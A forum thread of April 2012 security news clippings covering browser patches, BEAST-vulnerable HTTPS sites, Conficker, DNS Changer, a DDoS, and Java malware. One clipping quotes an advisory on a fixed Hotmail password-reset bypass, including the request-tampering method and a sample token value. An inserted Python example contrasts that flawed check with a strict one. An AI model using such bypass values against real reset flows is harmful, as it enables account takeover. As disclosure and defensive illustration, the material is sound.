The latest in the line of updates that have rolled off the Mozilla development line every six weeks since mid-2011, Firefox 12 fixed seven vulnerabilities labeled "critical," the highest threat ranking in Mozilla's four-step scoring, four bugs tagged "high" and three pegged "moderate."

Mozilla also patched 19 other bugs, all critical, in the mobile edition of Firefox, which runs on the Android platform.
Among the 14 desktop vulnerabilities, Mozilla patched three that could be used by hackers in cross-site scripting (XSS) attacks, one that applied only to Windows Vista and Windows 7 PCs with hardware acceleration disabled and another in image rendering done by the WebGL 3D standard.

Two of the bugs were reported by security researchers at rivals Google and Opera Software. The Google engineer also notified Mozilla of all 19 vulnerabilities in the FreeType library that affected the mobile version of the browser.

More at :-
http://www.computerworld.com/s/article/9226529/Moz...

--
mogs CClip 86
Expert Contributor 26th Apr, 2012 21:12
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Beta Channel Update
Wednesday, April 25, 2012 | 16:44
Labels: Beta updates
The Beta channel has been updated to 19.0.1084.36 for Windows, Mac, Linux, and Chrome Frame.

Take a look at the changelog to see what happened in this release.

If you'd like to get on the Beta channel, you can download it from our Beta download page. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome

http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 87
Expert Contributor 26th Apr, 2012 21:22
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Most of the Internet's top 200,000 HTTPS websites are insecure
Trustworthy Internet Movement say 75 percent of HTTPS websites from Alexa's top one million are vulnerable to the BEAST SSL attack

By Lucian Constantin | IDG News Service

Ninety percent of the Internet's top 200,000 HTTPS-enabled websites are vulnerable to known types of SSL (Secure Sockets Layer) attack, according to a report released Thursday by the Trustworthy Internet Movement (TIM), a nonprofit organization dedicated to solving Internet security, privacy and reliability problems.

The report is based on data from a new TIM project called SSL Pulse, which uses automated scanning technology developed by security vendor Qualys, to analyze the strength of HTTPS implementations on websites listed in the top one million published by Web analytics firm Alexa.

SSL Pulse checks what protocols are supported by the HTTPS-enabled websites (SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, etc.), the key length used for securing communications (512 bits, 1,024 bits, 2,048 bits, etc.) and the strength of the supported ciphers (256 bits, 128 bits or lower).

An algorithm is used to interpret the scan results and assign a score between 0 and 100 to each HTTPS configuration. The score is then translated into a grade, with A being the highest (over 80 points).

Half of the almost 200,000 websites in Alexa's top one million that support HTTPS received an A for the quality of their configurations. This means that they use a combination of modern protocols, strong ciphers and long keys.

Despite this, only 10 percent of the scanned websites were deemed truly secure. Seventy-five percent -- around 148,000 -- were found to be vulnerable to an attack known as BEAST (Browser Exploit Against SSL/TLS), which can be used to decrypt authentication tokens and cookies from HTTPS requests.

Read more at :-
http://www.infoworld.com/d/security/most-of-the-in...

--
mogs CClip 88
Expert Contributor 26th Apr, 2012 21:27
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
VMware ESX source code has been stolen and posted online, but the company says its virtualization platform doesn't necessarily pose an increased risk to customers.

The stolen code amounts to a single file from sometime around 2003 or 2004, the company says in a blog post.

"The fact that the source code may have been publicly shared does not necessarily mean that there is any increased risk to VMware customers," according to the blog written by Iain Mulholland, director of the company's Security Response Center.

The code was stolen from a Chinese company called CEIEC (China Electronics Import & Export Corporation) during a March breach, according to a posting on the Kaspersky Threat Post blog. The code along with internal VMware emails were posted online three days ago.

VMware didn't respond immediately to a request for more information about the impact of the breach on customers.

Eric Chiu, president of virtualization security firm Hytrust, says it's hard to say what VMware customers should do because there's not enough detail about how the exposed code is being used in current products. In general, though, customers should review the security for virtual environments to address the fact that a compromised hypervisor exposes multiple virtual machines.

Read more at :-
http://www.infoworld.com/d/security/vmware-source-...

--
mogs CClip 89
Expert Contributor 26th Apr, 2012 21:32
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Conficker worm is still troubling Microsoft

Virus won’t go away
By Dave Neal
Thu Apr 26 2012, 09:46

SOFTWARE FLOGGER Microsoft has warned that the Conficker virus is still residing on millions of Windows machines.
In its latest Security Intelligence Report, volume 12 (PDF), the firm said that the worm had raised its head 220 million times in the last two and a half years. It said that it is one of the biggest threats to businesses and continues to be a problem because people insist on using crappy passwords.
"Conficker is one of the biggest security problems we face, yet it is well within our power to defend against," said Tim Rains, director of Microsoft Trustworthy Computing.
"It is critically important that organisations focus on the security fundamentals to help protect against the most common threats."
The phrase "weak passwords" keeps coming up in the report and there are suggestions that users are slow to patch known vulnerabilities, but Microsoft did give the malware writers some credit for the continued spread of Conficker. It said that some of its successes come from persistence and determination and the use of different attack tactics.
"Most attacks do not possess new, super-advanced techniques or technology as the APT label implies; in the majority of cases, they simply exploit weak or stolen passwords or vulnerabilities for which a security update exists and employ social engineering," said Rains.

http://www.theinquirer.net/inquirer/news/2170432/c...

--
mogs CClip 90
Expert Contributor 26th Apr, 2012 21:38
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
DNS Changer Virus May Attack 20,000 Devices in UK

Written by Alex Serban
26 April, 2012 | Tags: security, fbi, malware, virus

And even more worldwide

The "DNS Changer" malware, one of the most widespread viruses at the moment, could attack more than 350,000 computers worldwide on 9th July, with a big portion of the infected being from the UK.

The FBI has stated that on the fated day, approximately half a million devices could lose internet access, leaving them unprotected against DNS Changer, a virus developed by an Estonian organisation and which was discovered back in November last year.

Since then, it has successfully infiltrated over 500,000 desktop computers, including Mac units, by hijacking the device without user knowledge and spamming clickable adverts. Although at first this could only mean a slightly slower connection for the owner, like a malware iceberg, much more lies beneath the surface.

The virus also has the means to disable antivirus software and to redirect precious information towards a main server. The virus can even disable the user's internet connection if it finds out that the server has been shut down, as the FBI previously attempted.

So officials have chosen to temporarily replace the server with a site that checks if the computer is infected and remove the virus if found.

Unfortunately, this clever scheme costs the bureau too much, and it has taken the decision to close the website on 9th July, leaving more than 350,000 infected computers without a live connection.

Reports show that 20,000 of those affected are from the UK and more than 85,000 can be found in America.

Read more: http://www.itproportal.com/2012/04/26/dns-changer-...

--
mogs CClip 91
Expert Contributor 26th Apr, 2012 21:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
UK2.NET smashed offline by '10-million-strong' botnet

Punters' websites go titsup after DNS servers nobbled
By Brid-Aine Parnell

Posted in Enterprise Security, 26th April 2012 10:02 GMT
British web hosting outfit UK2.NET was on the business end of a distributed denial-of-service attack last night that took down customers' websites.

The company's chief operating officer, Martin Baker, told The Register that UK2 had never seen a DDOS attack on this scale before.

"There was a botnet attack last night on our DNS servers. It was intermittent for people so they might see some sites up or down depending on when they're making the requests for pages," he explained. "We saw around 10 million apparently unique IPs attack us."

UK2 saw the peak of the attack at around midnight although customers first started seeing problems with their websites yesterday afternoon.

"We took various actions to trace this back to the IP addresses that they were attacking from so once we identified that we were able to put in mitigating activities to reduce it down and managed to get it off our network by about 3am," Baker said.

"The scale [of the attack] just took us longer than usual to mitigate," he added.

More at :-
http://www.theregister.co.uk/2012/04/26/uk2net_out...

--
mogs CClip 92
Expert Contributor 26th Apr, 2012 21:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Critical 0-Day in Hotmail Exploited in the Wild, Microsoft Issues Fix

Security researchers from the Vulnerability Lab identified a critical password reset and setup flaw in Microsoft’s Hotmail service. As it turns out, cybercriminals also found the same weakness and quickly saw a big profit in it, but thanks to experts from the Lab and Microsoft's Security Response Center a fix was issued to prevent abuse.

According to WhiteC0de, the flaw was also detected by a hacker from Saudi Arabia. The details of the hack got leaked on an underground forum where the hacking service was advertised for $20 (15 EUR) per hacked Hotmail/Live account.

In a matter of days, a number of Hotmail accounts were hijacked by cybercriminals, presumably from Morocco, who were in possession of the remote exploit.

Fortunately for Microsoft, experts from the Vulnerability Lab, independently found the same flaw on April 10. The Redmond company was notified on April 20 and rushed to issue a temporary fix the same day.

A patch was released a few days later, before massive damage could be done by the cybercriminals.

More at :-
http://news.softpedia.com/news/Critical-0-Day-in-H...

--
mogs CClip 93
Expert Contributor 28th Apr, 2012 11:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Ghost of HTML5 future: Web browser botnets

With great power comes great responsibility ... to not pwn the interweb
By John Leyden
B-Sides HTML5 will allow web designers to pull off tricks that were previously only possible with Adobe Flash or convoluted JavaScript. But the technology, already widely supported by web browsers, creates plenty of opportunities for causing mischief.

During a presentation at the B-Sides Conference in London on Wednesday, Robert McArdle, a senior threat researcher at Trend Micro, outlined how the revamped markup language could be used to launch browser-based botnets and other attacks. The new features in HTML5 - from WebSockets to cross-origin requests - could send tremors through the information security battleground and turn the likes of Chrome and Firefox into complete cybercrime toolkits.

Many of the attack scenarios involve using JavaScript to create memory-resident "botnets in a browser", McArdle warned, which can send spam, launch denial-of-service attacks or worse. And because an attack is browser-based, anything from a Mac OS X machine to an Android smartphone will be able to run the platform-neutral code, utterly simplifying the development of malware.

Read more at :-
http://www.theregister.co.uk/2012/04/27/html5/

--
mogs CClip 94
Expert Contributor 28th Apr, 2012 11:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft squashes Hotmail password hijack bug

Hackers offer to crack accounts for £12
By Anna Leach

Posted in Security, 27th April 2012 12:31 GMT
Microsoft has smacked down a Hotmail bug that allowed hackers to lock users out of their own accounts.

Redmond took one day to slap down a glitch that allowed anyone with a Firefox add-on to remotely reset the password of a Hotmail account. The Tamper Data add-on allowed hackers to siphon off the outgoing HTTP request from the browser in real time and then modify the data.

When they hit a password reset on a given email account they could fiddle the requests and input in a reset they chose. Vulnerability-lab.com outlined the details:

Remote attackers can bypass the password recovery service to set up a new password and bypass in place protections (token based). The token protection only checks if a value is empty, then blocks or closes the web session. A remote attacker can, for example, bypass the token protection with values “+++)-”. Successful exploitation results in unauthorized MSN or Hotmail account access.

The bug seems to have been around for a while, but has recently been targeted by hackers on a larger scale. Blog whitec0de pointed out that hackers online were advertising to crack Hotmail accounts for as little as $20 (£12).

According to the vulnerability-lab.com report: Microsoft was alerted to the flaw on 20 April, and got a fix out on 21 April, one day later. They went public with the fix yesterday.

Hotmail has 364 million users, according to a comscore report from 2010. ®

http://www.theregister.co.uk/2012/04/27/hotmail_bu...




--
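The token check described in the vulnerability-lab.com excerpt quoted in CClip 94, shown beside a stricter form. This is an added example, not part of the original post and not Microsoft's code; the class, method names, account name and token values are all hypothetical.

```python
import hashlib
import hmac
import secrets
import time


class ResetTokenStore:
    """Hypothetical in-memory store of pending password-reset tokens."""

    def __init__(self, ttl_seconds=900, clock=time.time):
        self._ttl = ttl_seconds
        self._clock = clock
        self._pending = {}  # account -> (sha256(token), expiry timestamp)

    def issue(self, account):
        """Create a single-use token; only its hash is kept server-side."""
        token = secrets.token_urlsafe(32)
        digest = hashlib.sha256(token.encode("utf-8")).digest()
        self._pending[account] = (digest, self._clock() + self._ttl)
        return token  # would be delivered out of band, e.g. by e-mail

    def check_weak(self, account, presented):
        """The flawed pattern from the advisory: only an empty value is
        rejected, so any non-empty string is treated as a valid token."""
        return presented != ""

    def check_strict(self, account, presented):
        """Accept only the token issued for this account, once, before expiry."""
        record = self._pending.get(account)
        if record is None or not isinstance(presented, str):
            return False
        digest, expires = record
        candidate = hashlib.sha256(
            presented.encode("utf-8", errors="replace")
        ).digest()
        # Constant-time comparison avoids leaking how many bytes matched.
        matches = hmac.compare_digest(candidate, digest)
        expired = self._clock() > expires
        if matches or expired:
            # Single use: a token is consumed on success and dropped on expiry.
            del self._pending[account]
        return matches and not expired


def demo():
    """Run both checks against constructed inputs and return the outcomes."""
    now = [1000.0]  # controllable clock so expiry can be shown offline
    account = "user@example.test"  # constructed account name
    junk = "not-a-real-token"  # constructed non-empty garbage value
    store = ResetTokenStore(ttl_seconds=900, clock=lambda: now[0])

    real = store.issue(account)
    results = {
        "weak_accepts_junk": store.check_weak(account, junk),
        "weak_rejects_empty": not store.check_weak(account, ""),
        "strict_rejects_junk": not store.check_strict(account, junk),
        "strict_accepts_real": store.check_strict(account, real),
        "strict_rejects_replay": not store.check_strict(account, real),
    }

    late = store.issue(account)
    now[0] += 901  # move past the 900-second lifetime
    results["strict_rejects_expired"] = not store.check_strict(account, late)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```
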
mogs CClip 95
Expert Contributor 28th Apr, 2012 11:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
27 APR 12
Correction to Java Update Story

An earlier version of this blog post incorrectly stated that Oracle had shipped security updates for its Java software. Oracle did push out an update for Java earlier this month — Java 6 Update 32 — but the new version was a maintenance update that did not include security fixes. My apologies for any confusion this may have caused.

http://krebsonsecurity.com/category/latest-warning...

--
mogs CClip 96
Expert Contributor 28th Apr, 2012 11:55
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Mozilla auto-upgrade will kill Firefox 3.6
Citing security risks, it will push 3.6 to Firefox 12 next month unless users disable updates

By Gregg Keizer | Computerworld

Mozilla will give Firefox 3.6 the coup de grace next month by automatically upgrading users of that 2010 browser to Firefox 12.

The move isn't a first for the open source developer: A year ago, it gave Firefox 3.5 the same auto-upgrade death blow.

According to Alex Keybl, Firefox's release manager, the automatic upgrade of Firefox 3.6 to Firefox 12 will take place in early May, although a date has not yet been set.

The decision to push Firefox 3.6 users to a newer edition has been under discussion for several weeks. In late March, Keybl brought it up on a Mozilla planning discussion thread, saying that the proposal was needed to keep users safe while they browsed.

Mozilla issued its final security update for Firefox 3.6 on Jan. 31, and officially retired the browser from support last Tuesday, April 24.

Mozilla has given Firefox 3.6 users plenty of warning, telling them several times over the last months that they need to upgrade because of the impending retirement. The newest such message told Firefox 3.6 users that it was their last warning before Mozilla switched on automatic upgrading.

Read more at :-
http://www.infoworld.com/d/applications/mozilla-au...

--
mogs CClip 97
Expert Contributor 28th Apr, 2012 12:01
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft Security Essentials Updated to Version 4.0

The company says the new version improves both scanning performance and malware detection rates.

By Jeff Goldman

Microsoft recently released the latest version of its free Microsoft Security Essentials (MSE) software for Windows.

"The bulk of the changes this time are under the hood," notes BetaNews' Mike Williams. "MSE’s 'Automatic Remediation' now does a better job of quarantining threats on its own, for instance, no user intervention required. And Microsoft claims scanning performance and malware detection rates have both improved on the previous build. The program can now also use the Microsoft Active Protection Service (the new name for SpyNet) to automatically report malware to Microsoft, helping the company to create new definitions and more quickly respond to new outbreaks. "

"Just a reminder about MSE’s origins: MSE was aimed first and foremost at users who either can’t or won’t pay for antivirus/anti-malware software, with the idea being that more secure Windows PCs mean less security risks for all Windows users," writes ZDNet's Mary-Jo Foley. "With MSE, there is no registration required, no trials with an expiration date or required renewals. But Microsoft does restrict the MSE download (both the beta and final) to PCs running Genuine Windows (which has been authenticated as non-pirated)."

"According to software analysis firm OPSWAT, Microsoft's Security Essentials came in at second [PDF file] for North American antivirus market share with 14.92 percent -- less than two points below the top-used antivirus software from Symantec," writes Redmondmag.com's Chris Paoli. "This last quarter saw Security Essentials overtake AVG for that second slot. However, for successful detection rates, antivirus software testing company AV-Comparatives ranked Microsoft last [PDF file] out of 15 antivirus makers for total detection rate. "

http://www.esecurityplanet.com/windows-security/mi...

--
mogs CClip 98
Expert Contributor 29th Apr, 2012 10:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Java-Exploiting Malware Targets Both Mac and Windows Users

SophosLabs experts have identified a new piece of malware which, similar to the infamous Flashback Trojan, leverages a vulnerability in Java to infect systems. This threat is designed to target not only Mac computers, but also ones running Windows.

The Python-based malicious element is served via hijacked websites which host exploits that check if the latest Java patch has been applied.

If the system is unpatched, a piece of code, identified by Sophos as Mal/JavaCmC-A is downloaded to the affected computer.

At this point, depending on the operating system (OS), Mal/Cleaman-B is downloaded by the Java code on Windows, and OSX/FlsplyDp-A is pushed onto devices that run Mac OS X.

Unfortunately for the victims, it doesn’t end here. Once these threats find themselves on a machine that runs a Microsoft OS, they will proceed to download a backdoor Trojan called Troj/FlsplyBD-A.

On Apple systems, a Python script, update.py (OSX/FlsplySc-A), is decrypted and starts acting as a backdoor which allows the attackers to send commands, execute arbitrary code, and steal files.

Graham Cluley advises users to run an updated antivirus solution if they sense that their devices might be infected, but Mac customers can rely on another technique to perform a check.

More at :-
http://news.softpedia.com/news/Java-Exploiting-Mal...

--
mogs CClip 99
Expert Contributor 29th Apr, 2012 10:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Firefox Aurora 14 Available for Download

If you’re curious of what’s to come to Firefox, the latest Aurora lays the plans in a straightforward manner, announcing notable new features, such as setting plugins to load only on click.

Search privacy is also among the changes, as in Aurora all the default ways to search rely on Google HTTPS search service. On the same note, the site identity manager has been tweaked to prevent spoofing of an SSL connection with favicons.

Another important change in Aurora 14 touches on the address bar (dubbed “Awesome”), which can now auto-complete typed URLs, in order to shorten the time spent to reach a previously visited web location.

On Mac OS X 10.7, Firefox Aurora comes with native full-screen support for apps.

Developers have not been forgotten as pointer lock API has been implemented as well as a new API that prevents the display from sleeping.

All these changes are to be expected in the stable version on July 17, this year.

http://news.softpedia.com/news/Firefox-Aurora-14-A...

--
mogs CClip 100
Expert Contributor 30th Apr, 2012 19:17
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Down but not out: Conficker camouflages new Windows infections
Crippled botnet still dangerous, makes PCs vulnerable to follow-up malware attacks

By Gregg Keizer
April 30, 2012 06:28 AM
Computerworld - Windows PCs infected with Conficker are more likely to be compromised by other malware because the worm masks those secondary infections and makes those machines easier to exploit, a security expert said.

That's the biggest reason why Conficker, although crippled and seemingly abandoned by its makers, remains a threat and should be eradicated, said Rodney Joffe, senior technologist at Neustar and a cybersecurity adviser to the White House.

Virginia-based Neustar is an information and analytics provider, and one of the corporate members of the Conficker Working Group (CWG), which has been "sinkholing" the Conficker botnet for more than two years.

"We're pretty sure that [other malware] is using Conficker for cover," Joffe said in an interview Friday. "When we find a machine [harboring Conficker], we usually find that it's been infected by other methods as well."

More at :-
http://www.computerworld.com/s/article/9226697/Dow...

--
mogs CClip 101
Expert Contributor 30th Apr, 2012 19:20
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Slow uptake of Windows 8 preview hints at lack of interest
If usage share equals enthusiasm, new OS half as interesting to users as Windows 7 was in its beta stage

By Gregg Keizer
April 30, 2012 12:09 PM ET
Computerworld - Windows users appear half as interested in trying out the new Windows 8 as they did three years ago when they jumped at the chance to test drive Windows 7, data shows.

According to Web analytics company Net Applications, only 0.11% of the computers that went online last week ran Windows 8. That number -- representing 11 machines out of each 10,000 -- was the same as Windows 8 averaged in March.

And it's significantly less than Windows 7's usage share at the same point in its development history.

At the end of the first two full months after the release of Windows 7 Beta, that operating system was powering 0.26% -- or 26 out of every 10,000 -- of the PCs that browsed the Web.

More at :-
http://www.computerworld.com/s/article/9226710/Slo...

--
mogs CClip 102
Expert Contributor 30th Apr, 2012 19:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Oracle provides Java fixes directly to Mac users
Mac users get Java updates at the same time as they are available for Windows and Linux with the release of Java SE 7 Update 4

By Roman Loyola | Macworld

The recent Flashback Trojan exposed a problem that OS X has with Java -- specifically, that the development of Java on the Mac hasn't kept pace with the Java for Windows or Linux. Flashback uses an unpatched Java vulnerability to install itself on a Mac, a hole that Oracle, the developers of Java, had patched in Java for other platforms. Apple eventually fixed the Java vulnerability with a Software Update release, though you can't help but think that Flashback could have been avoided entirely with an up-to-date Java.

Hopefully, exploited Java vulnerabilities will be a thing of the past. As reported by Ars Technica, Oracle is now giving Mac users the ability to get Java updates at the same time as they are available for Windows and Linux with the release of the Java SE 7 Update 4.

According to a blog post by Oracle's Henrik Stahl, "From this point on, every release of Oracle JDK 7 and JavaFX 2.1 (and later) will be available on Mac at the same time as for Linux, Windows and Solaris."

More at :-
http://www.infoworld.com/d/security/oracle-provide...

--
mogs CClip 103
Expert Contributor 30th Apr, 2012 19:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Symantec Threat Report: Malicious Attacks Up 81 Per Cent

Spam levels are down, but that’s a reflection of a shift towards social engineering

Symantec has just released its latest annual Internet Security Threat Report, which recorded a substantial increase in the amount of malicious attacks.

The security firm noted that it blocked some 5.5 billion malicious attacks throughout 2011, which was up 81 per cent on the previous year. Furthermore, the number of unique malware variants increased to 403 million, and the number of web attacks blocked per day went up by a third.

On the other hand, the better news was that new vulnerabilities discovered decreased by 20 per cent, a significant drop. Although as Symantec notes, this is partially a reflection of the amount of cyber-ne'er-do-wells who are adopting easy to use attack toolkits to take efficient advantage of existing vulnerabilities.

Spam levels also fell, which ties in with the findings of Sophos in its latest "dirty dozen" spam report. This may be in part due to service providers honing anti-spam measures, but is more indicative of a refocusing of cyber-criminal efforts away from traditional spam campaigns, targeting social networks instead.

Social engineering techniques exploit the viral nature of the networks, and make for a potentially serious snowball effect which the cyber-criminals are attempting to take maximum advantage of.

Read more: http://www.itproportal.com/2012/04/30/symantec-thr...

--
mogs CClip 104
Expert Contributor 30th Apr, 2012 19:55
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 1st May, 2012 21:25
Microsoft Ends Security Essentials 4 Beta Program

The final flavor of the latest version of Microsoft’s popular Security Essentials antivirus was made available for download last week.

The software was made available in a beta version in the fourth quarter of the last year, when Microsoft also launched the beta testing program for it.

The final flavor of Microsoft Security Essentials 4 was released to the public on April 25th, while the beta program ended the next day, on April 26th.

All those who beta tested the software and who have the automatic updates feature turned on on their computers will receive the new version via Windows Update.

However, they can also download and install the security product manually, as can all those who did not participate in the program.

Microsoft Security Essentials is a free security application, meant to provide users with protection against today’s threats in the malware landscape.

The software was made available with support for all computers running Windows XP Service Pack 3 (SP3), Windows Vista and Windows 7. It is compatible both with x86 and x64 computers.

In order to take advantage of Microsoft Security Essentials, users should have a genuine version of Windows installed on their computers.

Not only is it free to download and install, but MSE is also easy to use, and requires a low amount of resources to operate efficiently, which makes it a great option for users with older or less powerful machines.

“Microsoft Security Essentials is a free download from Microsoft that is simple to install, easy to use, and always kept up-to-date so you can be assured your PC is protected by the latest technology,” Microsoft explains.

“Microsoft Security Essentials runs quietly and efficiently in the background so you’re free to use your Windows-based PC the way you want—without interruptions or long computer wait times.”

The latest version of Microsoft Security Essentials is available for download from Softpedia via this link.

http://news.softpedia.com/news/Microsoft-Ends-Secu...


This thread is now closed....thank you for your support.......Please see May's CYBERCLIPS Edition at :-
http://secunia.com/community/forum/thread/show/125...

--